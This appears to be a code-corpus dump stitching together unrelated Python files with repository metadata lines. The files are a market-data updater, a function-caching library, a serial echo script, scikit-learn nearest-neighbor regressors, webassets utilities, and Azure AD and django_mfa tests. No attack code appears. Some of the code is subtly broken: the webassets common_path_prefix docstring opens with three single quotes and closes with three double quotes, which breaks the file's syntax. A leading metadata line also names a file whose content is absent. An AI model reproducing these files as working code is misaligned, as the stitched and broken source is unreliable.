| ricardodeazambuja/BrianConnectUDP | examples/OutputNeuronGroup_brian.py | Python | cc0-1.0 | 2,857 | 0.014351 |
# coding:utf-8
'''
Market data update functionality
'''
from __future__ import print_function
from datetime import datetime, timedelta
from symbols import Symbols
import yahoo
def update_marketdata(from_date=None, to_date=None, sym=Symbols()):
'''
    Fetch the latest market data and update it in the db
'''
for s in sym.symbols():
if not from_date:
from_date = datetime.now() - timedelta(days=10*365) # fetch market data for 10 years
if not to_date:
to_date = datetime.now() + timedelta(days=2) # use a future date since there might be issues with timezones
date = sym.last_date(s)
fdate = date + timedelta(days=1) if date is not None else from_date
(res, data) = yahoo.fetch_market_data(s, fdate, to_date)
if res:
sym.insert_historical_prices(s, [(x[0], x[1], x[2], x[3], x[4], x[5], x[6]) for x in data])
else:
# There are several reasons update can fail: 1. No new data; 2. wrong symbol; 3. Other reason.
print('Failed updating symbol %s' % s)
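# Minimal usage sketch, assuming a populated Symbols database:
#
#     if __name__ == '__main__':
#         update_marketdata()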
| dp0h/marketdata | marketdata/update.py | Python | mit | 1,099 | 0.00364 |
from __future__ import annotations
import abc
import shutil
import functools
from pathlib import Path
import urllib.parse
from typing import (
Callable, Any, TypeVar, cast, Tuple, Dict, Optional,
Union, Hashable,
)
import logging
from edgar_code.types import PathLike, Serializer, UserDict
from edgar_code.util.picklable_threading import RLock
logger = logging.getLogger(__name__)
CacheKey = TypeVar('CacheKey')
CacheReturn = TypeVar('CacheReturn')
CacheFunc = TypeVar('CacheFunc', bound=Callable[..., Any])
class Cache:
@classmethod
def decor(
cls,
obj_store: Callable[[str], ObjectStore[CacheKey, CacheReturn]],
hit_msg: bool = False, miss_msg: bool = False, suffix: str = '',
) -> Callable[[CacheFunc], CacheFunc]:
'''Decorator that creates a cached function
        >>> @Cache.decor(MemoryStore.create())
        ... def foo():
... pass
'''
def decor_(function: CacheFunc) -> CacheFunc:
return cast(
CacheFunc,
functools.wraps(function)(
cls(obj_store, function, hit_msg, miss_msg, suffix)
)
)
return decor_
disabled: bool
#pylint: disable=too-many-arguments
def __init__(
self,
obj_store: Callable[[str], ObjectStore[CacheKey, CacheReturn]],
function: CacheFunc,
hit_msg: bool = False, miss_msg: bool = False, suffix: str = ''
) -> None:
'''Cache a function.
Note this uses `function.__qualname__` to determine the file
name. If this is not unique within your program, define
suffix.
        Note this uses `function.version` when defined, so cached results
        from different versions of the same function will not collide.
'''
self.function = function
self.name = '-'.join(filter(bool, [
self.function.__qualname__,
suffix,
getattr(self.function, 'version', ''),
]))
self.obj_store = obj_store(self.name)
self.hit_msg = hit_msg
self.miss_msg = miss_msg
self.sem = RLock()
self.__qualname__ = f'Cache({self.name})'
self.disabled = False
def __call__(self, *pos_args: Any, **kwargs: Any) -> Any:
if self.disabled:
return self.function(*pos_args, **kwargs)
else:
with self.sem:
args_key = self.obj_store.args2key(pos_args, kwargs)
if args_key in self.obj_store:
if self.hit_msg:
logger.info('hit %s with %s, %s',
self.name, pos_args, kwargs)
res = self.obj_store[args_key]
else:
if self.miss_msg:
logger.info('miss %s with %s, %s',
self.name, pos_args, kwargs)
res = self.function(*pos_args, **kwargs)
self.obj_store[args_key] = res
return res
def clear(self) -> None:
'''Removes all cached items'''
self.obj_store.clear()
def __str__(self) -> str:
store_type = type(self.obj_store).__name__
return f'Cache of {self.name} with {store_type}'
ObjectStoreKey = TypeVar('ObjectStoreKey')
ObjectStoreValue = TypeVar('ObjectStoreValue')
class ObjectStore(UserDict[ObjectStoreKey, ObjectStoreValue], abc.ABC):
@classmethod
def create(
cls, *args: Any, **kwargs: Any
) -> Callable[[str], ObjectStore[ObjectStoreKey, ObjectStoreValue]]:
'''Curried init. Name will be applied later.'''
@functools.wraps(cls)
def create_(name: str) -> ObjectStore[ObjectStoreKey, ObjectStoreValue]:
return cls(*args, name=name, **kwargs) # type: ignore
return create_
def __init__(self, name: str) -> None:
super().__init__()
self.name = name
@abc.abstractmethod
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> ObjectStoreKey:
# pylint: disable=unused-argument,no-self-use
...
class MemoryStore(ObjectStore[Hashable, Any]):
def __init__(self, name: str):
# pylint: disable=non-parent-init-called
ObjectStore.__init__(self, name)
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> Hashable:
# pylint: disable=no-self-use
return to_hashable((args, kwargs))
class FileStore(MemoryStore):
'''An obj_store that persists at ./${CACHE_PATH}/${FUNCTION_NAME}_cache.pickle'''
def __init__(
self, cache_path: PathLike, name: str, serializer: Optional[Serializer] = None,
):
# pylint: disable=non-parent-init-called,super-init-not-called
ObjectStore.__init__(self, name)
if serializer is None:
import pickle
self.serializer = cast(Serializer, pickle)
else:
self.serializer = serializer
self.cache_path = pathify(cache_path) / (self.name + '_cache.pickle')
self.loaded = False
self.data = {}
def load_if_not_loaded(self) -> None:
if not self.loaded:
self.loaded = True
if self.cache_path.exists():
with self.cache_path.open('rb') as fil:
self.data = self.serializer.load(fil)
else:
self.cache_path.parent.mkdir(parents=True, exist_ok=True)
self.data = {}
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> Hashable:
# pylint: disable=no-self-use
return to_hashable((args, kwargs))
def commit(self) -> None:
self.load_if_not_loaded()
if self.data:
with self.cache_path.open('wb') as fil:
self.serializer.dump(self.data, fil)
else:
if self.cache_path.exists():
print('deleting ', self.cache_path)
self.cache_path.unlink()
def __setitem__(self, key: Hashable, obj: Any) -> None:
self.load_if_not_loaded()
super().__setitem__(key, obj)
self.commit()
def __delitem__(self, key: Hashable) -> None:
self.load_if_not_loaded()
super().__delitem__(key)
self.commit()
def clear(self) -> None:
self.load_if_not_loaded()
super().clear()
self.commit()
class DirectoryStore(ObjectStore[PathLike, Any]):
'''Stores objects at ./${CACHE_PATH}/${FUNCTION_NAME}/${urlencode(args)}.pickle'''
def __init__(
self, object_path: PathLike, name: str,
serializer: Optional[Serializer] = None
) -> None:
# pylint: disable=non-parent-init-called
ObjectStore.__init__(self, name)
if serializer is None:
import pickle
self.serializer = cast(Serializer, pickle)
else:
self.serializer = serializer
self.cache_path = pathify(object_path) / self.name
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> PathLike:
if kwargs:
args = args + (kwargs,)
fname = urllib.parse.quote(f'{safe_str(args)}.pickle', safe='')
return self.cache_path / fname
def __setitem__(self, path: PathLike, obj: Any) -> None:
path.parent.mkdir(parents=True, exist_ok=True)
with path.open('wb') as fil:
self.serializer.dump(obj, fil)
def __delitem__(self, path: PathLike) -> None:
path.unlink()
def __getitem__(self, path: PathLike) -> Any:
with path.open('rb') as fil:
return self.serializer.load(fil)
def __contains__(self, path: Any) -> bool:
if hasattr(path, 'exists'):
return bool(path.exists())
else:
return False
def clear(self) -> None:
print('deleting')
if hasattr(self.cache_path, 'rmtree'):
cast(Any, self.cache_path).rmtree()
else:
shutil.rmtree(str(self.cache_path))
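# Minimal usage sketch for the stores above (paths are illustrative):
#
#     @Cache.decor(DirectoryStore.create('/tmp/objcache'))
#     def fetch(url):
#         ...  # each distinct call is pickled to its own file
#
#     @Cache.decor(FileStore.create('/tmp/cache'))
#     def parse(text):
#         ...  # all results share one pickle file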
def to_hashable(obj: Any) -> Hashable:
'''Converts args and kwargs into a hashable type (overridable)'''
try:
hash(obj)
except TypeError:
if hasattr(obj, 'items'):
# turn dictionaries into frozenset((key, val))
# sorting is necessary to make equal dictionaries map to equal things
# sorted(..., key=hash)
return tuple(sorted(
[(keyf, to_hashable(val)) for keyf, val in obj.items()],
key=hash
))
elif hasattr(obj, '__iter__'):
# turn iterables into tuples
return tuple(to_hashable(val) for val in obj)
else:
raise TypeError(f"I don't know how to hash {obj} ({type(obj)})")
else:
return cast(Hashable, obj)
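# Example: equal dicts map to equal hashable values regardless of key order.
#
#     to_hashable({'a': 1, 'b': [2, 3]}) == to_hashable({'b': [2, 3], 'a': 1})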
def safe_str(obj: Any) -> str:
'''
Safe names are compact, unique, urlsafe, and equal when the objects are equal
str does not work because x == y does not imply str(x) == str(y).
>>> a = dict(d=1, e=1)
>>> b = dict(e=1, d=1)
>>> a == b
True
>>> str(a) == str(b)
False
>>> safe_str(a) == safe_str(b)
True
'''
if isinstance(obj, int):
ret = str(obj)
elif isinstance(obj, float):
ret = str(round(obj, 3))
elif isinstance(obj, str):
ret = repr(obj)
elif isinstance(obj, list):
ret = '[' + ','.join(map(safe_str, obj)) + ']'
elif isinstance(obj, tuple):
ret = '(' + ','.join(map(safe_str, obj)) + ')'
elif isinstance(obj, dict):
ret = '{' + ','.join(sorted(
safe_str(key) + ':' + safe_str(val)
for key, val in obj.items()
)) + '}'
else:
raise TypeError()
return urllib.parse.quote(ret, safe='')
def pathify(obj: Union[str, PathLike]) -> PathLike:
if isinstance(obj, str):
return Path(obj)
else:
return obj
| charmoniumQ/EDGAR-research | edgar_code/cache.py | Python | mit | 9,951 | 0.001306 |
from SerialBus import SerialBus
serialbus = SerialBus(baud = 19200, serialnum="ABCD")
while True:
cmd = input('Send: ')
answer = serialbus.send_request_wait(10, bytes(cmd, 'ascii'))
answer_str = "";
for char in answer:
answer_str += (chr(char))
print(answer_str)
| marplaa/SerialBus | python_lib/test_script/echo.py | Python | gpl-3.0 | 294 | 0.010204 |
"""Nearest Neighbor Regression"""
# Authors: Jake Vanderplas <vanderplas@astro.washington.edu>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Sparseness support by Lars Buitinck
# Multi-output support by Arnaud Joly <a.joly@ulg.ac.be>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import numpy as np
from .base import _get_weights, _check_weights, NeighborsBase, KNeighborsMixin
from .base import RadiusNeighborsMixin, SupervisedFloatMixin
from ..base import RegressorMixin
from ..utils import check_array
class KNeighborsRegressor(NeighborsBase, KNeighborsMixin,
SupervisedFloatMixin,
RegressorMixin):
"""Regression based on k-nearest neighbors.
The target is predicted by local interpolation of the targets
associated of the nearest neighbors in the training set.
Read more in the :ref:`User Guide <regression>`.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : integer, optional (default = 2)
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : string or callable, default 'minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of the DistanceMetric class for a
list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
n_jobs : int, optional (default = 1)
The number of parallel jobs to run for neighbors search.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Doesn't affect :meth:`fit` method.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import KNeighborsRegressor
>>> neigh = KNeighborsRegressor(n_neighbors=2)
>>> neigh.fit(X, y) # doctest: +ELLIPSIS
KNeighborsRegressor(...)
>>> print(neigh.predict([[1.5]]))
[ 0.5]
See also
--------
NearestNeighbors
RadiusNeighborsRegressor
KNeighborsClassifier
RadiusNeighborsClassifier
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances but
different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, n_neighbors=5, weights='uniform',
algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, n_jobs=1,
**kwargs):
self._init_params(n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params, n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
def predict(self, X):
"""Predict the target for the provided data
Parameters
----------
X : array-like, shape (n_query, n_features), \
or (n_query, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : array of int, shape = [n_samples] or [n_samples, n_outputs]
Target values
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
weights = _get_weights(neigh_dist, self.weights)
_y = self._y
if _y.ndim == 1:
_y = _y.reshape((-1, 1))
if weights is None:
y_pred = np.mean(_y[neigh_ind], axis=1)
else:
y_pred = np.empty((X.shape[0], _y.shape[1]), dtype=np.float64)
denom = np.sum(weights, axis=1)
for j in range(_y.shape[1]):
num = np.sum(_y[neigh_ind, j] * weights, axis=1)
y_pred[:, j] = num / denom
if self._y.ndim == 1:
y_pred = y_pred.ravel()
return y_pred
class RadiusNeighborsRegressor(NeighborsBase, RadiusNeighborsMixin,
SupervisedFloatMixin,
RegressorMixin):
"""Regression based on neighbors within a fixed radius.
The target is predicted by local interpolation of the targets
associated of the nearest neighbors in the training set.
Read more in the :ref:`User Guide <regression>`.
Parameters
----------
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : integer, optional (default = 2)
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : string or callable, default 'minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of the DistanceMetric class for a
list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import RadiusNeighborsRegressor
>>> neigh = RadiusNeighborsRegressor(radius=1.0)
>>> neigh.fit(X, y) # doctest: +ELLIPSIS
RadiusNeighborsRegressor(...)
>>> print(neigh.predict([[1.5]]))
[ 0.5]
See also
--------
NearestNeighbors
KNeighborsRegressor
KNeighborsClassifier
RadiusNeighborsClassifier
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, radius=1.0, weights='uniform',
algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, **kwargs):
self._init_params(radius=radius,
algorithm=algorithm,
leaf_size=leaf_size,
p=p, metric=metric, metric_params=metric_params,
**kwargs)
self.weights = _check_weights(weights)
def predict(self, X):
"""Predict the target for the provided data
Parameters
----------
X : array-like, shape (n_query, n_features), \
or (n_query, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : array of int, shape = [n_samples] or [n_samples, n_outputs]
Target values
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.radius_neighbors(X)
weights = _get_weights(neigh_dist, self.weights)
_y = self._y
if _y.ndim == 1:
_y = _y.reshape((-1, 1))
if weights is None:
y_pred = np.array([np.mean(_y[ind, :], axis=0)
for ind in neigh_ind])
else:
y_pred = np.array([(np.average(_y[ind, :], axis=0,
weights=weights[i]))
for (i, ind) in enumerate(neigh_ind)])
if self._y.ndim == 1:
y_pred = y_pred.ravel()
return y_pred
| mbayon/TFG-MachineLearning | venv/lib/python3.6/site-packages/sklearn/neighbors/regression.py | Python | mit | 10,967 | 0 |
from webassets import six
import contextlib
import os
import sys
from itertools import takewhile
from .exceptions import BundleError
__all__ = ('md5_constructor', 'pickle', 'set', 'StringIO',
'common_path_prefix', 'working_directory')
if sys.version_info >= (2, 5):
import hashlib
md5_constructor = hashlib.md5
else:
import md5
md5_constructor = md5.new
try:
import cPickle as pickle
except ImportError:
import pickle
try:
set
except NameError:
from sets import Set as set
else:
set = set
from webassets.six import StringIO
try:
from urllib import parse as urlparse
except ImportError: # Python 2
import urlparse
import urllib
def common_path_prefix(paths, sep=os.path.sep):
    '''os.path.commonprefix() is completely in the wrong place; it's
useless with paths since it only looks at one character at a time,
see http://bugs.python.org/issue10395
This replacement is from:
http://rosettacode.org/wiki/Find_Common_Directory_Path#Python
"""
def allnamesequal(name):
return all(n==name[0] for n in name[1:])
bydirectorylevels = zip(*[p.split(sep) for p in paths])
return sep.join(x[0] for x in takewhile(allnamesequal, bydirectorylevels))
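# Example:
#
#     common_path_prefix(['/usr/lib/python', '/usr/lib64'], sep='/')  # '/usr'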
@contextlib.contextmanager
def working_directory(directory=None, filename=None):
"""A context manager which changes the working directory to the given
path, and then changes it back to its previous value on exit.
Filters will often find this helpful.
Instead of a ``directory``, you may also give a ``filename``, and the
    working directory will be set to the directory that file is in.
"""
assert bool(directory) != bool(filename) # xor
if not directory:
directory = os.path.dirname(filename)
prev_cwd = os.getcwd()
os.chdir(directory)
try:
yield
finally:
os.chdir(prev_cwd)
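# Example: run a block of code from inside another directory.
#
#     with working_directory('/tmp'):
#         ...  # os.getcwd() == '/tmp' here; restored afterwards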
def make_option_resolver(clazz=None, attribute=None, classes=None,
allow_none=True, desc=None):
"""Returns a function which can resolve an option to an object.
The option may given as an instance or a class (of ``clazz``, or
duck-typed with an attribute ``attribute``), or a string value referring
to a class as defined by the registry in ``classes``.
    This supports arguments, so an option may look like this:
cache:/tmp/cachedir
If this must instantiate a class, it will pass such an argument along,
if given. In addition, if the class to be instantiated has a classmethod
``make()``, this method will be used as a factory, and will be given an
Environment object (if one has been passed to the resolver). This allows
classes that need it to initialize themselves based on an Environment.
"""
assert clazz or attribute or classes
    desc_string = ' to %s' % desc if desc else ''
def instantiate(clazz, env, *a, **kw):
# Create an instance of clazz, via the Factory if one is defined,
# passing along the Environment, or creating the class directly.
if hasattr(clazz, 'make'):
# make() protocol is that if e.g. the get_manifest() resolver takes
# an env, then the first argument of the factory is the env.
args = (env,) + a if env is not None else a
return clazz.make(*args, **kw)
return clazz(*a, **kw)
def resolve_option(option, env=None):
the_clazz = clazz() if callable(clazz) and not isinstance(option, type) else clazz
if not option and allow_none:
return None
# If the value has one of the support attributes (duck-typing).
if attribute and hasattr(option, attribute):
if isinstance(option, type):
return instantiate(option, env)
return option
# If it is the class we support.
if the_clazz and isinstance(option, the_clazz):
return option
elif isinstance(option, type) and issubclass(option, the_clazz):
return instantiate(option, env)
# If it is a string
elif isinstance(option, six.string_types):
parts = option.split(':', 1)
key = parts[0]
arg = parts[1] if len(parts) > 1 else None
if key in classes:
return instantiate(classes[key], env, *([arg] if arg else []))
raise ValueError('%s cannot be resolved%s' % (option, desc_string))
resolve_option.__doc__ = """Resolve ``option``%s.""" % desc_string
return resolve_option
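# Minimal usage sketch (BaseCache and FileCache are hypothetical): resolve an
# option that may be an instance, a class, or a registry string with an
# argument such as 'file:/tmp/cache'.
#
#     resolve_cache = make_option_resolver(
#         clazz=BaseCache, classes={'file': FileCache}, desc='a cache')
#     cache = resolve_cache('file:/tmp/cache')  # -> FileCache('/tmp/cache')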
def RegistryMetaclass(clazz=None, attribute=None, allow_none=True, desc=None):
"""Returns a metaclass which will keep a registry of all subclasses, keyed
by their ``id`` attribute.
The metaclass will also have a ``resolve`` method which can turn a string
into an instance of one of the classes (based on ``make_option_resolver``).
"""
def eq(self, other):
"""Return equality with config values that instantiate this."""
return (hasattr(self, 'id') and self.id == other) or\
id(self) == id(other)
def unicode(self):
return "%s" % (self.id if hasattr(self, 'id') else repr(self))
class Metaclass(type):
REGISTRY = {}
def __new__(mcs, name, bases, attrs):
if not '__eq__' in attrs:
attrs['__eq__'] = eq
if not '__unicode__' in attrs:
attrs['__unicode__'] = unicode
if not '__str__' in attrs:
attrs['__str__'] = unicode
new_klass = type.__new__(mcs, name, bases, attrs)
if hasattr(new_klass, 'id'):
mcs.REGISTRY[new_klass.id] = new_klass
return new_klass
resolve = staticmethod(make_option_resolver(
clazz=clazz,
attribute=attribute,
allow_none=allow_none,
desc=desc,
classes=REGISTRY
))
return Metaclass
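# Minimal usage sketch (hypothetical classes; Python 2 metaclass syntax to
# match this module's compatibility shims):
#
#     class Base(object):
#         __metaclass__ = RegistryMetaclass(attribute='id', desc='a backend')
#
#     class FileBackend(Base):
#         id = 'file'
#
#     Base.resolve('file')  # -> FileBackend instance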
def cmp_debug_levels(level1, level2):
"""cmp() for debug levels, returns True if ``level1`` is higher
than ``level2``."""
level_ints = {False: 0, 'merge': 1, True: 2}
try:
        cmp = lambda a, b: (a > b) - (a < b)  # Python 3 has no builtin cmp()
return cmp(level_ints[level1], level_ints[level2])
except KeyError as e:
# Not sure if a dependency on BundleError is proper here. Validating
# debug values should probably be done on assign. But because this
# needs to happen in two places (Environment and Bundle) we do it here.
raise BundleError('Invalid debug value: %s' % e)
| 0x1997/webassets | src/webassets/utils.py | Python | bsd-2-clause | 6,584 | 0.001367 |
import json
import pathlib
from unittest.mock import patch
from freezegun import freeze_time
from datahub.ingestion.run.pipeline import Pipeline
from datahub.ingestion.source.identity.azure_ad import AzureADConfig
from tests.test_helpers import mce_helpers
FROZEN_TIME = "2021-08-24 09:00:00"
def test_azure_ad_config():
config = AzureADConfig.parse_obj(
dict(
client_id="00000000-0000-0000-0000-000000000000",
tenant_id="00000000-0000-0000-0000-000000000000",
client_secret="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
redirect="https://login.microsoftonline.com/common/oauth2/nativeclient",
authority="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
token_url="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
graph_url="https://graph.microsoft.com/v1.0",
ingest_users=True,
ingest_groups=True,
ingest_group_membership=True,
)
)
# Sanity on required configurations
assert config.client_id == "00000000-0000-0000-0000-000000000000"
assert config.tenant_id == "00000000-0000-0000-0000-000000000000"
assert config.client_secret == "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
assert (
config.redirect
== "https://login.microsoftonline.com/common/oauth2/nativeclient"
)
assert (
config.authority
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000"
)
assert (
config.token_url
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token"
)
assert config.graph_url == "https://graph.microsoft.com/v1.0"
# assert on defaults
assert config.ingest_users
assert config.ingest_groups
assert config.ingest_group_membership
@freeze_time(FROZEN_TIME)
def test_azure_ad_source_default_configs(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
# Run an azure usage ingestion run.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": True,
"ingest_groups": True,
"ingest_users": True,
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_default_config.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_default_config.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_default_config.json",
)
@freeze_time(FROZEN_TIME)
def test_azure_source_ingestion_disabled(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
# Run an Azure usage ingestion run.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": "False",
"ingest_groups": "False",
"ingest_users": "False",
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_ingestion_disabled.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_ingestion_disabled.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_ingestion_disabled.json",
)
def load_test_resources(test_resources_dir):
azure_ad_users_json_file = test_resources_dir / "azure_ad_users.json"
azure_ad_groups_json_file = test_resources_dir / "azure_ad_groups.json"
with azure_ad_users_json_file.open() as azure_ad_users_json:
reference_users = json.loads(azure_ad_users_json.read())
with azure_ad_groups_json_file.open() as azure_ad_groups_json:
reference_groups = json.loads(azure_ad_groups_json.read())
return reference_users, reference_groups
def mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_groups_users
):
# mock token response
mock_token.return_value = "xxxxxxxx"
# mock users and groups response
users, groups = load_test_resources(test_resources_dir)
mock_users.return_value = iter(list([users]))
mock_groups.return_value = iter(list([groups]))
# For simplicity, each user is placed in ALL groups.
    mock_groups_users.return_value = [users]
| linkedin/WhereHows | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | Python | apache-2.0 | 7,798 | 0.002949 |
from django_mfa.models import *
from django.test import TestCase, Client
from django.contrib.auth.models import User
from django.contrib import auth
class Test_Models_Mfa_U2f(TestCase):
def setUp(self):
self.client = Client()
self.user = User.objects.create_user(
username='djangomfa@mp.com', email='djangomfa@mp.com', password='djangomfa')
self.userotp = UserOTP.objects.create(
otp_type='TOTP', user=self.user, secret_key='secret_key')
self.user_codes = UserRecoveryCodes.objects.create(user=UserOTP.objects.get(
user=self.user), secret_code="secret_code")
self.u2f_keys = self.user.u2f_keys.create(
public_key='publicKey',
key_handle='keyHandle',
app_id='https://appId',
)
self.client.login(username='djangomfa@mp.com', password="djangomfa")
def test_mfa_enabled(self):
self.assertTrue(is_mfa_enabled(auth.get_user(self.client)))
def test_u2f_enabled(self):
self.assertTrue(is_u2f_enabled(auth.get_user(self.client)))
def test_user_data_saved_correctly(self):
user_details = auth.get_user(self.client)
self.assertEqual(self.user.username, user_details.username)
self.assertEqual(self.user.email, user_details.email)
self.assertEqual(self.user.password, user_details.password)
def test_userotp_data_saved_correctly(self):
user_otp = UserOTP.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.userotp.otp_type, user_otp.otp_type)
self.assertEqual(self.userotp.user, user_otp.user)
self.assertEqual(self.userotp.secret_key, user_otp.secret_key)
def test_u2f_key_user(self):
user_u2f = U2FKey.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.u2f_keys.user, user_u2f.user)
self.assertEqual(self.u2f_keys.public_key, user_u2f.public_key)
self.assertEqual(self.u2f_keys.key_handle, user_u2f.key_handle)
self.assertEqual(self.u2f_keys.app_id, user_u2f.app_id)
def test_u2f_to_json_function(self):
user_u2f = U2FKey.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.u2f_keys.to_json(), user_u2f.to_json())
